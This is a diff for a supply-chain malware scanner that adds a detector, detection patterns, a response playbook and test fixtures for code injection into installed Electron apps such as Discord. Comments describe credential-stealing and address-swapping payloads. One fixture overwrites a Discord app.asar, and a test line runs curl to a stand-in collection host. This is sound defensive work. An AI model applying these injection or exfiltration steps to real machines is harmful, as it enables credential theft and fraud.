### PR TITLE
feat(scanner): detect third-party Electron app injection (MUADDIB-AST-097)

### DIFF
--- a/node_modules
+++ b/node_modules
@@ -1,0 +1,1 @@
+/opt/muaddib/node_modules

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.157",
+  "version": "2.11.158",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.157",
+      "version": "2.11.158",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.5.2",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.157",
+  "version": "2.11.158",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/monitor/classify.js
+++ b/src/monitor/classify.js
@@ -78,7 +78,11 @@ const HIGH_CONFIDENCE_MALICE_TYPES = new Set([
   // Phantom Gyp 2026-06: binding.gyp command-substitution = install-time RCE, quasi-never legit in benign packages
   'gyp_command_exec',
   // Phantom Gyp compound (Phase 1b): configure-time <!(node x.js) × independently-malicious invoked file
-  'gyp_phantom_exec'
+  'gyp_phantom_exec',
+  // electron_app_injection (MUADDIB-AST-097): install hook overwrites a THIRD-PARTY Electron app's
+  // core/.asar with injected code (payload-in-write coupling ⇒ FP≈0). Bypasses MT-1 cap like the
+  // other install-time RCE/injection markers above (node_modules_write, systemd_persistence).
+  'electron_app_injection'
 ]);
 
 // Lifecycle compound types that indicate real malicious intent beyond a simple postinstall

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -668,6 +668,15 @@ const PLAYBOOKS = {
     'ou modifie git config init.templateDir pour la persistence globale. ' +
     'Verifier .git/hooks/ et git config --global --list. Supprimer les hooks non reconnus.',
 
+  electron_app_injection:
+    'CRITIQUE: Injection dans une application Electron tierce. Le package localise une app Electron installee ' +
+    '(Discord, Atomic Wallet, Slack, ...) via os.homedir()+.asar/discord_desktop_core+existsSync, puis ecrase ' +
+    'son code (index.js du core module / app.asar) avec un payload injecte (hook webContents.debugger, override ' +
+    'XMLHttpRequest.prototype.send, BrowserWindow) — le payload s\'execute avec l\'identite de l\'app cible pour ' +
+    'intercepter credentials/MFA ou detourner des adresses crypto. Verifier l\'integrite de l\'app ciblee ' +
+    '(reinstaller depuis la source officielle), rechercher le code injecte dans son core/.asar, revoquer tout ' +
+    'credential saisi dans l\'app compromise, et supprimer le package. Considerer le poste comme compromis si le hook a tourne.',
+
   env_harvesting_dynamic:
     'Collecte dynamique de variables d\'environnement via Object.entries/keys/values(process.env) ' +
     'avec filtrage par patterns sensibles. Technique de vol de credentials a grande echelle. ' +

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -1155,6 +1155,20 @@ const RULES = {
     ],
     mitre: 'T1497'
   },
+  electron_app_injection: {
+    id: 'MUADDIB-AST-097',
+    name: 'Electron App Injection',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Un hook d\'installation localise une application Electron tierce deja installee chez la victime (Discord, Atomic Wallet, Slack, ...) — via os.homedir() + un chemin de signature Electron (.asar / discord_desktop_core / module core) + une sonde fs.existsSync — puis ecrase son code avec une charge utile JavaScript injectee, de sorte que le payload s\'execute avec l\'identite et les permissions de l\'application cible. Discriminant AST (vs proxy file-level): l\'ecriture (writeFileSync/appendFileSync) ecrit un CONTENU qui EST du code Electron injecte (BrowserWindow / webContents.debugger / *.prototype.X= / require(\'electron\')). Une app Electron legitime ecrit sa propre config JSON, jamais du code hookant les internals d\'une autre app. CRITICAL quand corrobore par le contexte de decouverte foreign-app; HIGH pour une ecriture nue ciblant un fichier .asar/core sous le home (GT-036 discord-electron-inject, GT-044 atomic-wallet-patch).',
+    references: [
+      'https://research.jfrog.com/post/duer-js-malicious-package/',
+      'https://thehackernews.com/2025/04/malicious-npm-package-targets-atomic.html',
+      'https://attack.mitre.org/techniques/T1554/'
+    ],
+    mitre: 'T1554'
+  },
   detached_process: {
     id: 'MUADDIB-AST-012',
     name: 'Detached Background Process',

--- a/src/scanner/ast-detectors/electron-injection.js
+++ b/src/scanner/ast-detectors/electron-injection.js
@@ -1,0 +1,233 @@
+'use strict';
+
+// MUADDIB-AST-097 — electron_app_injection shared detection helpers.
+//
+// Threat model: an install-time hook LOCATES a third-party Electron desktop app already
+// installed on the victim (Discord, Atomic Wallet, Slack, ...) by resolving the user's home
+// directory, matching an Electron signature path (.asar / *_desktop_core / an electron core
+// module), and probing it with fs.existsSync — then OVERWRITES that app's code with an injected
+// JavaScript payload, so the payload runs with the target app's identity and permissions.
+//   GT-036 (discord-electron-inject): overwrites Discord's discord_desktop_core/index.js with a
+//     webContents.debugger network hook that exfiltrates login/MFA responses to bada-stealer.com.
+//   GT-044 (atomic-wallet-patch): patches Atomic Wallet's app.asar bundle with an
+//     XMLHttpRequest.prototype.send hook that swaps crypto recipient addresses.
+//
+// The DISCRIMINATOR (why this beats a file-level co-occurrence proxy): the malice is not that a
+// file *mentions* BrowserWindow/.asar — a legitimate Electron app's own main process mentions all
+// of those. The malice is that a filesystem WRITE writes CONTENT that IS injected Electron code
+// into a FOREIGN app. So we couple, at AST level:
+//   (1) the write's CONTENT resolves to injected-Electron-code markers (the payload), AND
+//   (2) module context proves foreign-app discovery: os.homedir() + Electron-sig path + existsSync.
+// A legit Electron app writes JSON *config* (settings.json), never source that hooks another app's
+// internals — so coupling the payload to the write is what separates injection from an app writing
+// its own settings, WITHOUT the evadable "is this file itself an Electron main?" heuristic.
+//
+// Consumed by: handle-call-expression.js (write-sink + fact collection), handle-variable-declarator.js
+// & handle-assignment-expression.js (injected-code variable tracking), handle-post-walk.js (emit).
+
+const { extractStringValueDeep } = require('./helpers.js');
+
+// An Electron *target path* signature: an installed app's packed archive or a native core module.
+//   app.asar / core.asar / *.asar(.unpacked)   — Electron ASAR archive
+//   discord_desktop_core / betterdiscord         — Discord's swappable core module (well-known target)
+//   modules/<x>_core / *_desktop_core            — Electron "<app>_core" native module convention
+const ELECTRON_SIG_RE = /\.asar\b|discord_desktop_core|betterdiscord|[\\/]modules[\\/][A-Za-z0-9_.-]*_core\b|_desktop_core\b/i;
+
+// Injected-Electron-code markers — tokens that make written CONTENT an injection payload, not config.
+//   HOOK markers (interception / tamper): near-zero in benign written content.
+const ELECTRON_HOOK_MARKERS =
+  /\bwebContents\b|\bdebugger\s*\.\s*(?:attach|on|sendCommand)\b|\bNetwork\s*\.\s*(?:enable|responseReceived|getResponseBody)\b|\bipcRenderer\b|\.\s*prototype\s*\.\s*[A-Za-z_$][\w$]*\s*=/;
+//   APP markers (electron surface): boilerplate-ish, weaker alone but a payload signal in write content.
+const ELECTRON_APP_MARKERS =
+  /\bBrowserWindow\b|require\s*\(\s*['"]electron['"]\s*\)|module\s*\.\s*exports\s*=\s*require\s*\(/;
+// A write's content is a payload when it carries a HOOK marker OR an APP marker.
+const ELECTRON_PAYLOAD_MARKERS = new RegExp(ELECTRON_HOOK_MARKERS.source + '|' + ELECTRON_APP_MARKERS.source);
+
+const HOME_PATH_STR_RE = /[\\/]home[\\/]|[\\/]Users[\\/]|appdata|localappdata|userprofile|[\\/]\.config[\\/]|^~[\\/]/i;
+
+// Best-effort: collect all string-literal fragments reachable from a node subtree (array
+// elements, `.join()`/`.concat()` receivers+args, `+` concatenation, template quasis, conditional
+// branches). Bounded in depth and total length. Used to test whether a write's CONTENT argument
+// (or a variable initializer) carries injected-Electron-code markers even when it is built as
+// `[ ...lines ].join("\n")` or `"...hook..." + fileContent`.
+function collectCodeString(node, depth, acc) {
+  if (!node || depth > 6 || acc.budget <= 0) return acc.s;
+  switch (node.type) {
+    case 'Literal':
+      if (typeof node.value === 'string') { acc.s += node.value + '\n'; acc.budget -= node.value.length + 1; }
+      break;
+    case 'TemplateLiteral':
+      for (const q of node.quasis || []) { const raw = q.value.raw; acc.s += raw + '\n'; acc.budget -= raw.length + 1; }
+      for (const e of node.expressions || []) collectCodeString(e, depth + 1, acc);
+      break;
+    case 'BinaryExpression':
+      if (node.operator === '+') { collectCodeString(node.left, depth + 1, acc); collectCodeString(node.right, depth + 1, acc); }
+      break;
+    case 'ArrayExpression':
+      for (const el of node.elements || []) collectCodeString(el, depth + 1, acc);
+      break;
+    case 'CallExpression': {
+      const m = node.callee && node.callee.type === 'MemberExpression' && node.callee.property
+        ? node.callee.property.name : null;
+      if (m === 'join' || m === 'concat') {
+        collectCodeString(node.callee.object, depth + 1, acc);
+        for (const a of node.arguments || []) collectCodeString(a, depth + 1, acc);
+      }
+      break;
+    }
+    case 'ConditionalExpression':
+      collectCodeString(node.consequent, depth + 1, acc);
+      collectCodeString(node.alternate, depth + 1, acc);
+      break;
+    default:
+      break;
+  }
+  return acc.s;
+}
+
+function resolveCodeString(node) {
+  return collectCodeString(node, 0, { s: '', budget: 20000 });
+}
+
+// Does this subtree reference a variable already known to hold injected Electron code?
+// Handles `hook + "\n" + fileContent` (BinaryExpression), templates, and array joins.
+function referencesInjectedVar(node, ctx, depth) {
+  if (!node || depth > 6 || !ctx.injectedCodeVars) return false;
+  switch (node.type) {
+    case 'Identifier':
+      return ctx.injectedCodeVars.has(node.name);
+    case 'BinaryExpression':
+      return node.operator === '+' &&
+        (referencesInjectedVar(node.left, ctx, depth + 1) || referencesInjectedVar(node.right, ctx, depth + 1));
+    case 'TemplateLiteral':
+      return (node.expressions || []).some(e => referencesInjectedVar(e, ctx, depth + 1));
+    case 'ConditionalExpression':
+      return referencesInjectedVar(node.consequent, ctx, depth + 1) || referencesInjectedVar(node.alternate, ctx, depth + 1);
+    case 'CallExpression': {
+      const m = node.callee && node.callee.type === 'MemberExpression' && node.callee.property
+        ? node.callee.property.name : null;
+      if (m === 'join' || m === 'concat') {
+        return referencesInjectedVar(node.callee.object, ctx, depth + 1) ||
+          (node.arguments || []).some(a => referencesInjectedVar(a, ctx, depth + 1));
+      }
+      return false;
+    }
+    default:
+      return false;
+  }
+}
+
+// True if a node (a variable initializer or a write's content arg) carries an injected payload:
+// it references a tracked injected-code variable, or it statically resolves to code with markers.
+function carriesInjectedPayload(node, ctx) {
+  if (!node) return false;
+  if (node.type === 'Identifier') return !!(ctx.injectedCodeVars && ctx.injectedCodeVars.has(node.name));
+  if (referencesInjectedVar(node, ctx, 0)) return true;
+  return ELECTRON_PAYLOAD_MARKERS.test(resolveCodeString(node));
+}
+
+// An argument that roots a path in the user's HOME (where a victim's apps are installed):
+//   os.homedir() | process.env.{HOME,APPDATA,LOCALAPPDATA,USERPROFILE,XDG_CONFIG_HOME}
+//   | "~"/"~/..." | absolute "/home/..", "/Users/..", "C:\Users\.." literal
+function isHomeRootArg(node) {
+  if (!node) return false;
+  if (node.type === 'CallExpression' && node.callee && node.callee.type === 'MemberExpression' &&
+      node.callee.object && node.callee.object.type === 'Identifier' && node.callee.object.name === 'os' &&
+      node.callee.property && node.callee.property.type === 'Identifier' && node.callee.property.name === 'homedir') {
+    return true;
+  }
+  if (node.type === 'MemberExpression' &&
+      node.object && node.object.type === 'MemberExpression' &&
+      node.object.object && node.object.object.type === 'Identifier' && node.object.object.name === 'process' &&
+      node.object.property && node.object.property.type === 'Identifier' && node.object.property.name === 'env' &&
+      node.property && node.property.type === 'Identifier' &&
+      ['HOME', 'APPDATA', 'LOCALAPPDATA', 'USERPROFILE', 'XDG_CONFIG_HOME'].includes(node.property.name)) {
+    return true;
+  }
+  if (node.type === 'Literal' && typeof node.value === 'string') {
+    if (/^~(?:[\\/]|$)/.test(node.value)) return true;
+    if (/^\/home\/|^\/Users\/|:[\\/]Users[\\/]/i.test(node.value)) return true;
+  }
+  return false;
+}
+
+function _scanPathArgForSig(arg, ctx) {
+  if (!arg) return;
+  const s = extractStringValueDeep(arg);
+  if (s && ELECTRON_SIG_RE.test(s)) ctx.hasElectronAppSig = true;
+  if (arg.type === 'CallExpression' && arg.callee && arg.callee.type === 'MemberExpression' &&
+      arg.callee.object && arg.callee.object.type === 'Identifier' && arg.callee.object.name === 'path' &&
+      arg.callee.property && arg.callee.property.type === 'Identifier' &&
+      (arg.callee.property.name === 'join' || arg.callee.property.name === 'resolve')) {
+    const joined = (arg.arguments || []).map(a => extractStringValueDeep(a) || '').join('/');
+    if (ELECTRON_SIG_RE.test(joined)) ctx.hasElectronAppSig = true;
+    if ((arg.arguments || []).some(isHomeRootArg)) ctx.hasHomedirResolve = true;
+  }
+}
+
+// Collect the foreign-app-discovery corroboration facts from a CallExpression:
+//   os.homedir()                                → hasHomedirResolve
+//   fs.existsSync/accessSync/statSync/lstatSync → hasFsExistsProbe (+ sig/home from the probed path)
+//   path.join/path.resolve                      → hasElectronAppSig / hasHomedirResolve
+//   app.whenReady/app.getPath/.loadURL/.loadFile → hasOwnElectronMain (the file IS an Electron main;
+//                                                   gates the HIGH tier so a real app's self-writes
+//                                                   are not flagged as tampering).
+function scanElectronFacts(node, ctx) {
+  const callee = node.callee;
+  if (!callee || callee.type !== 'MemberExpression' || !callee.property || callee.property.type !== 'Identifier') return;
+  const prop = callee.property.name;
+  const objName = callee.object && callee.object.type === 'Identifier' ? callee.object.name : null;
+
+  if (objName === 'os' && prop === 'homedir') ctx.hasHomedirResolve = true;
+
+  if (prop === 'existsSync' || prop === 'accessSync' || prop === 'statSync' || prop === 'lstatSync') {
+    ctx.hasFsExistsProbe = true;
+    _scanPathArgForSig(node.arguments && node.arguments[0], ctx);
+  }
+
+  if (objName === 'path' && (prop === 'join' || prop === 'resolve')) {
+    const joined = (node.arguments || []).map(a => extractStringValueDeep(a) || '').join('/');
+    if (ELECTRON_SIG_RE.test(joined)) ctx.hasElectronAppSig = true;
+    if ((node.arguments || []).some(isHomeRootArg)) ctx.hasHomedirResolve = true;
+  }
+
+  if ((prop === 'whenReady' && (objName === 'app' || objName === 'electron')) ||
+      (prop === 'getPath' && objName === 'app') ||
+      prop === 'loadURL' || prop === 'loadFile') {
+    ctx.hasOwnElectronMain = true;
+  }
+}
+
+// For the HIGH tier: does a write TARGET resolve to a home-rooted Electron file? Handles an inline
+// path.join/path.resolve, a bare literal, or an Identifier bound to a tracked path.join result
+// (ctx.electronTargetVars — the common `const target = path.join(os.homedir(), ..., 'app.asar')`).
+function resolveElectronTarget(node, ctx) {
+  if (node && node.type === 'Identifier' && ctx && ctx.electronTargetVars && ctx.electronTargetVars.has(node.name)) {
+    return ctx.electronTargetVars.get(node.name);
+  }
+  let pathStr = '';
+  let home = false;
+  if (node && node.type === 'CallExpression' && node.callee && node.callee.type === 'MemberExpression' &&
+      node.callee.object && node.callee.object.type === 'Identifier' && node.callee.object.name === 'path' &&
+      node.callee.property && node.callee.property.type === 'Identifier' &&
+      (node.callee.property.name === 'join' || node.callee.property.name === 'resolve')) {
+    pathStr = (node.arguments || []).map(a => extractStringValueDeep(a) || '').join('/');
+    if ((node.arguments || []).some(isHomeRootArg)) home = true;
+  } else {
+    pathStr = extractStringValueDeep(node) || '';
+  }
+  if (HOME_PATH_STR_RE.test(pathStr)) home = true;
+  return { sig: ELECTRON_SIG_RE.test(pathStr), home, pathStr: pathStr.slice(0, 120) };
+}
+
+module.exports = {
+  ELECTRON_SIG_RE,
+  ELECTRON_PAYLOAD_MARKERS,
+  ELECTRON_HOOK_MARKERS,
+  resolveCodeString,
+  carriesInjectedPayload,
+  referencesInjectedVar,
+  isHomeRootArg,
+  scanElectronFacts,
+  resolveElectronTarget
+};

--- a/src/scanner/ast-detectors/handle-assignment-expression.js
+++ b/src/scanner/ast-detectors/handle-assignment-expression.js
@@ -11,10 +11,18 @@ const {
   resolveStringConcat,
   extractStringValueDeep
 } = require('./helpers.js');
+const { carriesInjectedPayload } = require('./electron-injection.js');
 
 function handleAssignmentExpression(node, ctx) {
   // Variable reassignment: x += 'process' or x = x + 'process'
   if (node.left?.type === 'Identifier') {
+    // MUADDIB-AST-097: propagate injected-Electron-code taint across reassignment. Covers
+    // `content = hook + "\n" + content` where `hook` is a payload array-join, so the subsequent
+    // writeFileSync(target, content) is recognised as writing an injected payload.
+    if ((node.operator === '=' || node.operator === '+=') &&
+        carriesInjectedPayload(node.right, ctx)) {
+      ctx.injectedCodeVars.add(node.left.name);
+    }
     if (node.operator === '+=' && ctx.stringVarValues.has(node.left.name)) {
       const rightVal = extractStringValueDeep(node.right);
       if (rightVal !== null) {

--- a/src/scanner/ast-detectors/handle-call-expression.js
+++ b/src/scanner/ast-detectors/handle-call-expression.js
@@ -96,6 +96,11 @@ const {
 const { countInvisibleUnicode } = require('../../shared/unicode-invisibles.js');
 const { classifyMcpWrite } = require('./mcp-write-classifier.js');
 const { isShadowEnabled, recordShadowDivergence } = require('../../shared/shadow.js');
+const {
+  carriesInjectedPayload,
+  scanElectronFacts,
+  resolveElectronTarget
+} = require('./electron-injection.js');
 
 /**
  * SHADOW 3-tier classification for mcp_config_injection emissions (R5 + R5b).
@@ -171,6 +176,11 @@ function _isUserLevelPathArg(node, depth = 0) {
 
 function handleCallExpression(node, ctx) {
   const callName = getCallName(node);
+
+  // MUADDIB-AST-097: collect foreign-Electron-app-discovery facts (os.homedir / existsSync /
+  // .asar-electron-core path.join / own-app markers). Correlated with the payload-write in
+  // handlePostWalk to emit electron_app_injection.
+  scanElectronFacts(node, ctx);
 
   // Detect require() with non-literal argument (obfuscation)
   if (callName === 'require' && node.arguments.length > 0) {
@@ -966,6 +976,28 @@ function handleCallExpression(node, ctx) {
     }
   }
 
+
+  // MUADDIB-AST-097: electron_app_injection — a filesystem write whose CONTENT resolves to
+  // injected Electron code (BrowserWindow / webContents-debugger hook / prototype override /
+  // require('electron')). The payload-in-write coupling is the AST discriminator vs a legit
+  // Electron app writing JSON config. The foreign-app-discovery corroboration (os.homedir +
+  // .asar/electron-core sig + existsSync) and the final verdict are assembled in handlePostWalk.
+  // A home-rooted .asar/electron-core *target* write (payload not statically resolvable) is
+  // recorded separately for the HIGH tier.
+  if (node.callee.type === 'MemberExpression' && node.callee.property?.type === 'Identifier') {
+    const eaiMethod = node.callee.property.name;
+    if (['writeFileSync', 'writeFile', 'appendFileSync', 'appendFile'].includes(eaiMethod) &&
+        node.arguments.length >= 2) {
+      if (carriesInjectedPayload(node.arguments[1], ctx)) {
+        ctx.electronPayloadWrites.push({ method: eaiMethod });
+      } else {
+        const tgt = resolveElectronTarget(node.arguments[0], ctx);
+        if (tgt.sig && tgt.home) {
+          ctx.electronAsarTargetWrites.push({ method: eaiMethod, pathStr: tgt.pathStr });
+        }
+      }
+    }
+  }
 
   // Detect fs.chmodSync with executable permissions (deferred to postWalk for compound check)
   if (node.callee.type === 'MemberExpression' && node.callee.property?.type === 'Identifier') {

--- a/src/scanner/ast-detectors/handle-post-walk.js
+++ b/src/scanner/ast-detectors/handle-post-walk.js
@@ -640,6 +640,39 @@ function handlePostWalk(ctx) {
       });
     }
   }
+
+  // MUADDIB-AST-097: electron_app_injection — an install hook overwrites a THIRD-PARTY Electron
+  // app's core/.asar with injected code (GT-036 Discord debugger-hook stealer → bada-stealer.com;
+  // GT-044 Atomic Wallet XMLHttpRequest.prototype.send address-swap). The discriminating AST
+  // coupling (assembled here from facts collected during the walk): a writeFileSync whose CONTENT
+  // resolves to injected Electron code (electronPayloadWrites), corroborated by the foreign-app
+  // discovery context — os.homedir() + a .asar/electron-core signature path + an existsSync probe.
+  // A legit Electron app writes JSON *config*, never source that hooks another app's internals, so
+  // the payload-in-write coupling is what separates injection from an app writing its own settings
+  // (no need for the evadable "is this file itself an Electron main?" exclusion). dist/bundled
+  // files are suppressed: an app's own minified main naturally carries these tokens.
+  const _eaiDist = /^(?:dist|build|out|output|vendor)[/\\]/i.test(ctx.relFile) ||
+                   /\.(?:bundle|min)\.js$/i.test(ctx.relFile);
+  if (!_eaiDist) {
+    const foreignAppDiscovery = ctx.hasHomedirResolve && ctx.hasElectronAppSig && ctx.hasFsExistsProbe;
+    if ((ctx.electronPayloadWrites?.length || 0) > 0 && foreignAppDiscovery) {
+      const w = ctx.electronPayloadWrites[0];
+      ctx.threats.push({
+        type: 'electron_app_injection',
+        severity: 'CRITICAL',
+        message: `Electron app injection: ${w.method}() overwrites a foreign Electron app — located via os.homedir()+.asar/electron-core+existsSync — with injected code (BrowserWindow/webContents-debugger/prototype-override/require('electron')). Third-party desktop-app code injection (Discord/Atomic-Wallet class): the payload runs with the target app's identity.`,
+        file: ctx.relFile
+      });
+    } else if ((ctx.electronAsarTargetWrites?.length || 0) > 0 && !ctx.hasOwnElectronMain) {
+      const w = ctx.electronAsarTargetWrites[0];
+      ctx.threats.push({
+        type: 'electron_app_injection',
+        severity: 'HIGH',
+        message: `Electron app tampering: ${w.method}() overwrites a user-home Electron app file "${w.pathStr}" (.asar/electron-core). Writing into an installed desktop app is an injection/patching technique; the injected payload was not statically resolvable.`,
+        file: ctx.relFile
+      });
+    }
+  }
 }
 
 

--- a/src/scanner/ast-detectors/handle-variable-declarator.js
+++ b/src/scanner/ast-detectors/handle-variable-declarator.js
@@ -16,12 +16,31 @@ const {
   extractStringValueDeep,
   isStaticValue
 } = require('./helpers.js');
+const { carriesInjectedPayload, resolveElectronTarget } = require('./electron-injection.js');
 
 function handleVariableDeclarator(node, ctx) {
   if (node.id?.type === 'Identifier') {
     // Track statically-assigned variables for dynamic_require qualification
     if (node.init && isStaticValue(node.init)) {
       ctx.staticAssignments.add(node.id.name);
+    }
+
+    // MUADDIB-AST-097: track variables whose value is injected Electron code (the write payload).
+    // Covers `var injectedPayload = [ "...BrowserWindow...", ... ].join("\n")` and any concat /
+    // template / literal carrying payload markers. Consumed by the write-sink check + post-walk.
+    if (node.init && carriesInjectedPayload(node.init, ctx)) {
+      ctx.injectedCodeVars.add(node.id.name);
+    }
+
+    // MUADDIB-AST-097: track variables bound to a path.join/resolve that builds an Electron app
+    // file path (for the HIGH-tier bare-.asar-target write, where the write target is a variable,
+    // e.g. `const target = path.join(os.homedir(), '.config', 'discord', 'app.asar')`).
+    if (node.init && node.init.type === 'CallExpression' && node.init.callee?.type === 'MemberExpression' &&
+        node.init.callee.object?.type === 'Identifier' && node.init.callee.object.name === 'path' &&
+        node.init.callee.property?.type === 'Identifier' &&
+        (node.init.callee.property.name === 'join' || node.init.callee.property.name === 'resolve')) {
+      const eaiTgt = resolveElectronTarget(node.init);
+      if (eaiTgt.sig) ctx.electronTargetVars.set(node.id.name, eaiTgt);
     }
 
     // AST-018 alias capture (@longzy): `var env = process.env` — record the alias so a later

--- a/src/scanner/ast.js
+++ b/src/scanner/ast.js
@@ -158,6 +158,16 @@ function analyzeFile(content, filePath, basePath) {
     objectPropertyMap: new Map(),     // B5: objName → Map<propName, stringValue>
     concatValues: new Map(),          // B2: varName → { value, operands } for concat strings with ≥3 operands
     stringVarValues: new Map(),       // Variable reassignment tracking: varName → string value
+    // MUADDIB-AST-097 electron_app_injection: injected-code variable taint + write-sink records +
+    // foreign-Electron-app-discovery facts (os.homedir + .asar/electron-core sig + existsSync probe).
+    injectedCodeVars: new Set(),      // vars whose value is injected Electron code (write payload)
+    electronTargetVars: new Map(),    // varName → {sig,home,pathStr} for a path.join Electron target
+    electronPayloadWrites: [],        // writeFile* calls whose CONTENT is an injected payload
+    electronAsarTargetWrites: [],     // writeFile* calls whose TARGET is a home-rooted .asar/core file
+    hasHomedirResolve: false,         // os.homedir() / process.env.{HOME,APPDATA,...} resolved
+    hasElectronAppSig: false,         // a .asar / *_desktop_core / electron-core path constructed
+    hasFsExistsProbe: false,          // fs.existsSync/accessSync/statSync (probe the victim install)
+    hasOwnElectronMain: false,        // file IS an Electron main (app.whenReady/loadURL/...) — gates HIGH
     hasFromCharCode: content.includes('fromCharCode'),
     // Anti-analysis / sandbox evasion (2026, @longzy DPRK). Structural "detonation-gate wall"
     // magnitude + host recon + a charcode-hidden analyzer-honeytoken reference. Aggregated in

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 269 RULES + 5 PARANOID (Track D +3, gyp_command_exec +1, gyp_phantom_exec +1, GHA-005/006 +2, lifecycle_version99 COMPOUND-018 +1, anti_analysis_evasion + analyzer_honeytoken_reference AST-095/096 +2)', () => {
+  test('v8b: rule count is 270 RULES + 5 PARANOID (Track D +3, gyp_command_exec +1, gyp_phantom_exec +1, GHA-005/006 +2, lifecycle_version99 COMPOUND-018 +1, anti_analysis_evasion + analyzer_honeytoken_reference AST-095/096 +2, electron_app_injection AST-097 +1)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 269, `Expected 269 RULES, got ${ruleCount}`);
+    assert(ruleCount === 270, `Expected 270 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/monitor.test.js
+++ b/tests/integration/monitor.test.js
@@ -7062,11 +7062,11 @@ async function runMonitorTests() {
 
   // ===== v2.7.6 C1: High-confidence malice bypass =====
 
-  test('MONITOR: HIGH_CONFIDENCE_MALICE_TYPES contains 30 threat types', () => {
-    // 30 = 29 + gyp_phantom_exec (Phase 1b Phantom-Gyp compound).
-    assert(HIGH_CONFIDENCE_MALICE_TYPES.size === 31,
-      `Should have 30 types, got ${HIGH_CONFIDENCE_MALICE_TYPES.size}`);
-    assert(HIGH_CONFIDENCE_MALICE_TYPES.has('gyp_phantom_exec'), 'Missing gyp_phantom_exec');
+  test('MONITOR: HIGH_CONFIDENCE_MALICE_TYPES contains 32 threat types', () => {
+    // 32 = 31 + electron_app_injection (MUADDIB-AST-097, third-party Electron app code injection).
+    assert(HIGH_CONFIDENCE_MALICE_TYPES.size === 32,
+      `Should have 32 types, got ${HIGH_CONFIDENCE_MALICE_TYPES.size}`);
+    assert(HIGH_CONFIDENCE_MALICE_TYPES.has('electron_app_injection') && HIGH_CONFIDENCE_MALICE_TYPES.has('gyp_phantom_exec'), 'Missing electron_app_injection/gyp_phantom_exec');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('lifecycle_shell_pipe'), 'Missing lifecycle_shell_pipe');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('fetch_decrypt_exec'), 'Missing fetch_decrypt_exec');
     assert(HIGH_CONFIDENCE_MALICE_TYPES.has('download_exec_binary'), 'Missing download_exec_binary');

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -160,11 +160,11 @@ jobs:
   // 3.3b Rule count check (Track D +3, gyp_command_exec MUADDIB-PKG-023 +1,
   // gyp_phantom_exec MUADDIB-COMPOUND-017 +1 → 259 RULES; P2b GHA-005 unpinned_action
   // + GHA-006 unpinned_action_in_risky_workflow +2 → 261 RULES)
-  test('P3: rule count is 269 RULES + 5 PARANOID (lifecycle_version99 COMPOUND-018 +1, anti_analysis_evasion + analyzer_honeytoken_reference AST-095/096 +2)', () => {
+  test('P3: rule count is 270 RULES + 5 PARANOID (lifecycle_version99 COMPOUND-018 +1, anti_analysis_evasion + analyzer_honeytoken_reference AST-095/096 +2, electron_app_injection AST-097 +1)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 269, `Expected 269 RULES, got ${ruleCount}`);
+    assert(ruleCount === 270, `Expected 270 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/run-tests.js
+++ b/tests/run-tests.js
@@ -65,6 +65,7 @@ const { runPyPIMaintainerTests } = require('./scanner/pypi-maintainer.test');
 const { runPyPIReleaseZeroTests } = require('./scanner/pypi-release-zero.test');
 const { runAIConfigTests } = require('./scanner/ai-config.test');
 const { runAntiScannerInjectionTests } = require('./scanner/anti-scanner-injection.test');
+const { runElectronInjectionTests } = require('./scanner/electron-injection.test');
 const { runDeobfuscateTests } = require('./scanner/deobfuscate.test');
 const { runModuleGraphTests } = require('./scanner/module-graph.test');
 const { runReachabilityTests } = require('./scanner/reachability.test');
@@ -267,6 +268,7 @@ async function timed(name, fn) {
   // Scanner unit tests (continued)
   await timed('ai-config', runAIConfigTests);
   await timed('anti-scanner-injection', runAntiScannerInjectionTests);
+  await timed('electron-injection', runElectronInjectionTests);
   await timed('deobfuscate', runDeobfuscateTests);
   await timed('module-graph', runModuleGraphTests);
   await timed('reachability', runReachabilityTests);

--- a/tests/samples/electron-injection/asar-literal-write/patch.js
+++ b/tests/samples/electron-injection/asar-literal-write/patch.js
@@ -1,0 +1,18 @@
+// POSITIVE (HIGH tier): overwrites a home-rooted Electron app.asar with an opaque buffer.
+// The injected payload is not statically resolvable (built by an external helper), so the rule
+// cannot confirm the content is code — but writing into an installed app's .asar under the user's
+// home is app tampering → HIGH.
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+
+function buildPatchedAsar() {
+  // opaque — returns bytes assembled at runtime
+  return Buffer.from([0x04, 0x00, 0x00, 0x00]);
+}
+
+const target = path.join(os.homedir(), '.config', 'discord', 'resources', 'app.asar');
+if (fs.existsSync(target)) {
+  const patched = buildPatchedAsar();
+  fs.writeFileSync(target, patched);
+}

--- a/tests/samples/electron-injection/electron-builder-pack/build.js
+++ b/tests/samples/electron-injection/electron-builder-pack/build.js
@@ -1,0 +1,13 @@
+// NEGATIVE: an electron-builder-style packer. It writes an app.asar (a .asar signature) into the
